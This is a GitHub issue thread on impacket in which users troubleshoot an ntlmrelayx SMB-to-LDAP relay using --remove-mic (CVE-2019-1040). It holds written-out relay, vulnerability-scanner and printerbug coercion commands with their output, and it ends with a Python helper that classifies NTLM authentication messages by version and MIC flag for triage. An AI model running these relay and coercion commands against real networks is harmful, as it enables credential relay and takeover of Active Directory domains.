fortra / impacket

Impacket is a collection of Python classes for working with network protocols.
https://www.coresecurity.com

ntlmrelayx SMB to LDAP remove-mic and CVE-2019-1040 #1222

Open s0i37 opened 2 years ago

s0i37 commented 2 years ago

Configuration

impacket version: 0.9.24
Python version: Python 3.9.2
Target OS: Kali GNU/Linux Rolling x64

Debug Output With Command String

sudo ntlmrelayx.py -t ldap://10.0.0.10 --remove-mic -i -debug
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack DCSYNC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Setting up WCF Server
[*] Servers started, waiting for connections

[*] SMBD-Thread-4: Connection from CORP/CRM2016$@10.0.0.100 controlled, attacking target ldap://10.0.0.10
[-] Authenticating against ldap://10.0.0.10 as USSC/CRM2016$ FAILED
[*] SMBD-Thread-5: Connection from /@10.0.0.100 controlled, attacking target ldap://10.0.0.10
[*] Authenticating against ldap://10.0.0.10 as / SUCCEED
[*] Started interactive Ldap shell via TCP on 127.0.0.1:11000
[+] No more targets for user /
[*] SMBD-Thread-5: Connection from /@10.0.0.100 controlled, but there are no more targets left!

So, relay SMB->LDAP doesn't work.

Additional context

python scan.py 'corp.org/user'@10.0.0.100
[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth
Password:
[*] Target 10.0.0.100 is VULNERABLE to CVE-2019-1040 (authentication was accepted)
python printerbug.py 'corp.org/user'@10.0.0.100 10.0.0.200
[*] Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Password:
[*] Attempting to trigger authentication via rprn RPC at 10.0.0.100
[*] Bind OK
[*] Got handle
The NETBIOS connection with the remote host timed out.
[*] Triggered RPC backconnect, this may or may not have worked
[-] [Errno 104] Connection reset by peer

jagotu commented 2 years ago

One thing that immediately stands out is these two lines:

[*] SMBD-Thread-4: Connection from CORP/CRM2016$@10.0.0.100 controlled, attacking target ldap://10.0.0.10
[-] Authenticating against ldap://10.0.0.10 as USSC/CRM2016$ FAILED

It seems it's trying to authenticate as USSC/CRM2016$ using creds for CORP/CRM2016$. Any idea where the USSC might come from?

s0i37 commented 2 years ago

No no. My mistake. USSC=CORP. I just manually replaced it.

0xdeaddood commented 2 years ago

Hi @s0i37! Do you have a packet capture?

Thanks!

s0i37 commented 2 years ago

Unfortunately I can't provide a packet capture for security reasons. Probably you can understand the reason from the pictures.

(image: 1-printerbug)

(image: 2-smb)

(image: 3-ldap)

sho-luv commented 1 year ago

I have the opposite problem. CVE-2019-1040 scanner says it's not vulnerable, however --remove-mic was successful.

s0i37 commented 1 year ago

Probably it was NetNTLMv1?
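The disagreement between the scanner and a relay in the last two comments comes down to what is actually inside the client's NTLM AUTHENTICATE_MESSAGE: an NTLMv2 response carries AV pairs, and the MsvAvFlags bit 0x2 there is how the client tells the server a MIC is present, whereas an NTLMv1 response (24-byte NtChallengeResponse) has no AV pairs and therefore no MIC signal at all. The triage helper below is an added example written for this thread, not code from impacket or from any of the commenters; it parses a Type 3 blob as a responder would pull it from a capture and reports the version and MIC state. Field offsets follow MS-NLMP 2.2.1.3, 2.2.2.8 and 2.2.2.1; the sample messages are constructed with placeholder, non-cryptographic values (the CORP/CRM2016$ names are taken from the log above, everything else is made up).

```python
"""Triage an NTLM AUTHENTICATE_MESSAGE (Type 3): NTLM version and MIC state.

Layout per MS-NLMP 2.2.1.3 (message), 2.2.2.8 (NTLMv2_RESPONSE) and 2.2.2.1
(AV_PAIR). Sample blobs below are constructed with placeholder values.
"""
import struct
from dataclasses import dataclass, field

MSV_AV_EOL = 0x0000
MSV_AV_NB_DOMAIN_NAME = 0x0002
MSV_AV_FLAGS = 0x0006
MSV_AV_FLAG_MIC_PRESENT = 0x00000002   # MS-NLMP 2.2.2.1: "client provides a MIC"
NTLMSSP_NEGOTIATE_VERSION = 0x02000000
HEADER_LEN = 88                        # fixed header incl. Version (8) and MIC (16)


@dataclass
class AuthSummary:
    user: str
    domain: str
    ntlm_version: int              # 1 (24-byte NtChallengeResponse) or 2
    mic_flag_set: bool             # MsvAvFlags & 0x2; always False for NTLMv1
    mic: bytes                     # 16-byte MIC field (zeros when not supplied)
    av_pairs: dict = field(default_factory=dict)


def _read_field(msg, off):
    """Resolve a Len/MaxLen/Offset descriptor to the payload bytes it points at."""
    length, _maxlen, offset = struct.unpack_from('<HHI', msg, off)
    return msg[offset:offset + length]


def parse_av_pairs(blob):
    """Parse the AV_PAIR list up to MsvAvEOL; tolerant of a truncated tail."""
    pairs, pos = {}, 0
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from('<HH', blob, pos)
        pos += 4
        if av_id == MSV_AV_EOL:
            break
        pairs[av_id] = blob[pos:pos + av_len]
        pos += av_len
    return pairs


def parse_authenticate(msg):
    if msg[:8] != b'NTLMSSP\x00' or struct.unpack_from('<I', msg, 8)[0] != 3:
        raise ValueError('not an NTLM AUTHENTICATE_MESSAGE')
    nt_resp = _read_field(msg, 20)
    domain = _read_field(msg, 28).decode('utf-16-le')
    user = _read_field(msg, 36).decode('utf-16-le')
    mic = msg[72:HEADER_LEN]
    if len(nt_resp) == 24:
        # NTLMv1 (or NTLM2 session security): no AV pairs, so no MIC signal exists
        return AuthSummary(user, domain, 1, False, mic, {})
    # NTLMv2: 16-byte NTProofStr + 28-byte NTLMv2_CLIENT_CHALLENGE header, then AV pairs
    av = parse_av_pairs(nt_resp[44:])
    raw = av.get(MSV_AV_FLAGS, b'')
    av_flags = struct.unpack('<I', raw)[0] if len(raw) == 4 else 0
    return AuthSummary(user, domain, 2, bool(av_flags & MSV_AV_FLAG_MIC_PRESENT), mic, av)


def classify(msg):
    """Short verdict a responder can act on when reviewing a capture."""
    s = parse_authenticate(msg)
    if s.ntlm_version == 1:
        return 'ntlmv1-no-mic-possible'
    return 'ntlmv2-mic-advertised' if s.mic_flag_set else 'ntlmv2-mic-flag-cleared'


# ---- constructed sample messages (hypothetical values, not from a real capture) ----
def build_av_pairs(pairs):
    body = b''.join(struct.pack('<HH', av_id, len(v)) + v for av_id, v in pairs.items())
    return body + struct.pack('<HH', MSV_AV_EOL, 0)


def build_ntlmv2_response(av_blob):
    proof = b'\x11' * 16                                        # placeholder NTProofStr
    client_challenge = (b'\x01\x01' + b'\x00' * 6               # RespType, HiRespType, Reserved1/2
                        + struct.pack('<Q', 0x01D7F00D00000000)  # placeholder FILETIME
                        + b'\x22' * 8 + b'\x00' * 4)            # ChallengeFromClient, Reserved3
    return proof + client_challenge + av_blob


def build_authenticate(user, domain, nt_resp, mic=b'\x00' * 16, lm_resp=b'\x00' * 24):
    payload, descriptors = b'', []
    for blob in (lm_resp, nt_resp, domain.encode('utf-16-le'),
                 user.encode('utf-16-le'), b'', b''):           # workstation, session key empty
        descriptors.append(struct.pack('<HHI', len(blob), len(blob), HEADER_LEN + len(payload)))
        payload += blob
    return (b'NTLMSSP\x00' + struct.pack('<I', 3) + b''.join(descriptors)
            + struct.pack('<I', NTLMSSP_NEGOTIATE_VERSION) + b'\x00' * 8 + mic + payload)


def sample_ntlmv2_with_mic():
    av = build_av_pairs({MSV_AV_NB_DOMAIN_NAME: 'CORP'.encode('utf-16-le'),
                         MSV_AV_FLAGS: struct.pack('<I', MSV_AV_FLAG_MIC_PRESENT)})
    return build_authenticate('CRM2016$', 'CORP', build_ntlmv2_response(av), mic=b'\x33' * 16)


def sample_ntlmv2_flag_cleared():
    av = build_av_pairs({MSV_AV_NB_DOMAIN_NAME: 'CORP'.encode('utf-16-le'),
                         MSV_AV_FLAGS: struct.pack('<I', 0)})
    return build_authenticate('CRM2016$', 'CORP', build_ntlmv2_response(av))


def sample_ntlmv1():
    return build_authenticate('CRM2016$', 'CORP', b'\x44' * 24)


if __name__ == '__main__':
    for fn in (sample_ntlmv2_with_mic, sample_ntlmv2_flag_cleared, sample_ntlmv1):
        print(f'{fn.__name__:28} -> {classify(fn())}')
```

Run against the NTLMSSP blob of the relayed SMB session (the same data the maintainer asked for) and the verdict tells you which case you are in: `ntlmv1-no-mic-possible` means the client never had a MIC to strip, so a "successful" --remove-mic says nothing about the target's CVE-2019-1040 patch state and the real finding is that NTLMv1 is still accepted; `ntlmv2-mic-flag-cleared` is the message shape a patched server is expected to reject.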